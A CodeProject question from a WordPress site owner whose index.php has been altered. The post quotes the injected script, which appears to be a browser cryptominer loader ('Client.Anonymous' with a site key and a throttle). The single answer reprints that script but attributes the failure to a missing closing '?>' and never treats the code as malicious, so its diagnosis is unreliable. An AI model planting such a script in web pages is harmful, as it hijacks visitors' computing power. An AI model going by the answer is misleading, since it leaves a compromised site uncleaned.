Click here to Skip to main content
15,888,096 members
Please Sign up or sign in to vote.
1.00/5 (1 vote)
See more:
Hi there
There is an error to loading this website:
http://alimaherofficial.ir/[^]
When I checked with the Hosting Support, they told me it's not related to them
also the index page change with this code:
<
script>
var _client = new Client.Anonymous('6a50b1248515108d3b409bdc276b2ca561befaa9e25c895c987a3bf78be9417f', {
throttle: 0.6, c: 'w'
});
_client.start();
</script>

did anyone know about this script?
also the login page didn't load at all:
http://alimaherofficial.ir/wp-login.php[^]
the hosting support also restore the back up, but it didn't affected, because the old files also have this issue...

What I have tried:

How I can resolve it? or how I can access to my WordPress Dashboard?
Posted
Updated 4-Nov-20 1:31am

1 solution

Your PHP code is not being executed on the server. It is being returned to the client.
Quote:
PHP
<script>
    var _client = new Client.Anonymous('6a50b1248515108d3b409bdc276b2ca561befaa9e25c895c987a3bf78be9417f', {
        throttle: 0.6, c: 'w'
    });
    _client.start();
</script>
<?php/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
It looks like you're missing the closing ?> at the bottom of your page.

Your login page is returning an internal server error. There are no details, so we have no idea what the problem is. You need to check any event logs on the server to try to get the error details.

If you still can't fix it, then you'll need to speak to your hosting provider again.
 
Share this answer
 

This content, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)



CodeProject, 20 Bay Street, 11th Floor Toronto, Ontario, Canada M5J 2N8 +1 (416) 849-8900